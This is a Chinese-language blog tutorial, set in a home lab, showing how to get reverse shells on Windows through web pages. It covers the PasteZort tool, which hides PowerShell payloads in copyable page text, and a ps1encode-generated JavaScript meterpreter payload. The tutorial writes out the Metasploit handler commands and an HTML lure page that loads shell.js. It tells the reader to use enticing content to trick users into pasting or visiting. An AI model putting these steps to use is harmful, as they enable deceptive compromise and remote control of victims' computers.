JS 反弹 Shell

• 前阵子看了篇文章《JS 反弹 Shell》，发在聊骚群里，好基友复现出来了，我也整一手。

• 参考文章：

  • https://joner11234.github.io/article/ea975567.html
  • https://mp.weixin.qq.com/s/0JUo3fwQDV120zmkm5ZxvA

• 前情提要：

  • 攻击机：Kali Linux 2023.3 - 10.10.8.21
  • 靶机：Windows 7 SP1 - 10.10.8.17

CMD 运行

• 下载工具：

git clone https://github.com/ZettaHack/PasteZort.git

• 授予权限（不给权限可能报错）：

cd PasteZort
chmod -R 777 .

• 运行一下：

python2 PasteZ0rt.py

• 选择平台、Payload，填写 IP 和监听端口：

• 设置完后让填写网页的信息，可以随意填写，也可以写一些诱导性的内容，让用户将其复制到 cmd 中运行，写完后按回车，再输入 y 按回车确定：

• 设置完成后会自动打开 msf 并且设置好监听，并同时开启 apache 服务：

• 这时候打开浏览器输入攻击机的 IP，可以看到网页的内容是自己设置的内容：

• 使用审查元素查看网页源码，其实 powershell 恶意代码已经隐藏在网页中，这时只需要复制网页显示的内容，就可以同时复制到恶意代码：

• 复制内容后打开 cmd，点击复制后代码自动运行，并且看不到恶意代码的内容：

• 回到 kali 上可以看到已经获得一个 session：

• 是的，没错，感觉非常的鸡肋。
• 换一种方式，有没有可能在对方访问网页时就可以反弹 Shell 呢？

JS 网页

• 这种利用方式依赖于 ActivateX 控件，所以局限性较大，成功的条件是必须使用IE浏览器打开（只有 IE 浏览器有 ActivateX 控件），并且点击运行组织内容和允许 ActivateX 控件。

• 下载工具：

git clone https://github.com/CroweCybersecurity/ps1encode

• 生成 jS 文件：

cd ps1encode
./ps1encode.rb --LHOST 10.10.8.21 --LPORT 4444 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js >> shell.js

• 使用 MSF 开启监听：

msfconsole
use exploit/multi/handler
set LHOST 10.10.8.21
set payload windows/meterpreter/reverse_tcp
run

• 在本地开启 Apache 服务，创建隐蔽的 html 文件以及图片文件进行迷惑用户，在 html 文件中引用恶意的 JS 文件：

<html>
<head>
    <title>SimpleTest</title>
    <meta name="renderer" content="ie-comp">
</head>
<body>
<img src='https://yongz.fun/img/page_img/page_img86.png'>
<script src='shell.js'></script>
</body>
</html>

• 之后将恶意文件发送给用户诱导用户访问对应 html 文件：

• 之后成功反弹 Shell 回来：

• 但是要开启 ActivateX 控件还是比较鸡肋的，不过像 360 安全浏览器这种支持双核，开启兼容模式也是可以反弹的：

• MSF 上查看现象：

• 只不过需要加入可信站点，还是很鸡肋：

• 也可以不用在浏览器上进行切换，直接在 head 标签中指定 IE 兼容内核：

<html>
<head>
    <title>SimpleTest</title>
    <meta name="renderer" content="ie-comp">
</head>
<body>
<img src='https://yongz.fun/img/page_img/page_img86.png'>
<script src='shell.js'></script>
</body>
</html>

• 不过这里我只在 Win7 上成功了，好基友说 Win10、Win11 都行，我咋是都没反弹，淦。